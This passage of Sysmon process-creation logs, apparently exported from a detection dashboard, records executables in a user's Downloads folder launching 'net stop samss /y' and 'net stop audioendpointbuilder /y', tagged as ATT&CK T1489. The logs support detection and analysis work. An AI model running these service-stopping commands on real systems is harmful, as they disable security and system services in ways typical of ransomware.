MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d272-5ec7-0000-00100e654700}\r\nParentProcessId: 295780\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:24:02.379"",""processGuid"":""{df9fc3d3-d272-5ec7-0000-0010d96a4700}"",""processId"":""295872"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d272-5ec7-0000-00100e654700}"",""parentProcessId"":""295780"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:42:10.725",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:24:02.360 +ProcessGuid: {df9fc3d3-d272-5ec7-0000-00103a6a4700} +ProcessId: 295864 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d26e-5ec7-0000-0010010c4700} +ParentProcessId: 3208 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:02.370988300Z"",""eventRecordID"":""1365"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:24:02.360\r\nProcessGuid: {df9fc3d3-d272-5ec7-0000-00103a6a4700}\r\nProcessId: 295864\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d26e-5ec7-0000-0010010c4700}\r\nParentProcessId: 3208\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:24:02.360"",""processGuid"":""{df9fc3d3-d272-5ec7-0000-00103a6a4700}"",""processId"":""295864"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d26e-5ec7-0000-0010010c4700}"",""parentProcessId"":""3208"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:42:10.709",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:24:02.103 +ProcessGuid: {df9fc3d3-d272-5ec7-0000-00100e654700} +ProcessId: 295780 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:02.173226000Z"",""eventRecordID"":""1364"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:24:02.103\r\nProcessGuid: {df9fc3d3-d272-5ec7-0000-00100e654700}\r\nProcessId: 295780\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:24:02.103"",""processGuid"":""{df9fc3d3-d272-5ec7-0000-00100e654700}"",""processId"":""295780"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:42:10.693",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:58.807 +ProcessGuid: {df9fc3d3-d26e-5ec7-0000-0010010c4700} +ProcessId: 3208 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:01.902503500Z"",""eventRecordID"":""1363"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:58.807\r\nProcessGuid: {df9fc3d3-d26e-5ec7-0000-0010010c4700}\r\nProcessId: 3208\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:58.807"",""processGuid"":""{df9fc3d3-d26e-5ec7-0000-0010010c4700}"",""processId"":""3208"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:41:56.298",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:48.189 +ProcessGuid: {df9fc3d3-d264-5ec7-0000-0010fbc54500} +ProcessId: 33396 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d263-5ec7-0000-0010eabf4500} +ParentProcessId: 236100 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:48.195685700Z"",""eventRecordID"":""1358"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:48.189\r\nProcessGuid: {df9fc3d3-d264-5ec7-0000-0010fbc54500}\r\nProcessId: 33396\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d263-5ec7-0000-0010eabf4500}\r\nParentProcessId: 236100\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:48.189"",""processGuid"":""{df9fc3d3-d264-5ec7-0000-0010fbc54500}"",""processId"":""33396"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d263-5ec7-0000-0010eabf4500}"",""parentProcessId"":""236100"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:41:56.294",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:47.796 +ProcessGuid: {df9fc3d3-d263-5ec7-0000-00101bc14500} +ProcessId: 42812 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d263-5ec7-0000-001048b64500} +ParentProcessId: 268680 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:47.864699000Z"",""eventRecordID"":""1357"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:47.796\r\nProcessGuid: {df9fc3d3-d263-5ec7-0000-00101bc14500}\r\nProcessId: 42812\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d263-5ec7-0000-001048b64500}\r\nParentProcessId: 268680\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:47.796"",""processGuid"":""{df9fc3d3-d263-5ec7-0000-00101bc14500}"",""processId"":""42812"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d263-5ec7-0000-001048b64500}"",""parentProcessId"":""268680"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:41:56.290",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:47.724 +ProcessGuid: {df9fc3d3-d263-5ec7-0000-0010eabf4500} +ProcessId: 236100 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:47.770103900Z"",""eventRecordID"":""1356"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:23:47.724\r\nProcessGuid: {df9fc3d3-d263-5ec7-0000-0010eabf4500}\r\nProcessId: 236100\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900}\r\nParentProcessId: 5232\r\nParentImage: C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-22 13:23:47.724"",""processGuid"":""{df9fc3d3-d263-5ec7-0000-0010eabf4500}"",""processId"":""236100"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-001031791900}"",""parentProcessId"":""5232"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:41:56.280",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:23:47.408 +ProcessGuid: {df9fc3d3-d263-5ec7-0000-001048b64500} +ProcessId: 268680 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-001031791900} +ParentProcessId: 5232 +ParentImage: C:\Users\John Williams\Downloads\sQCMgCG.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" 8 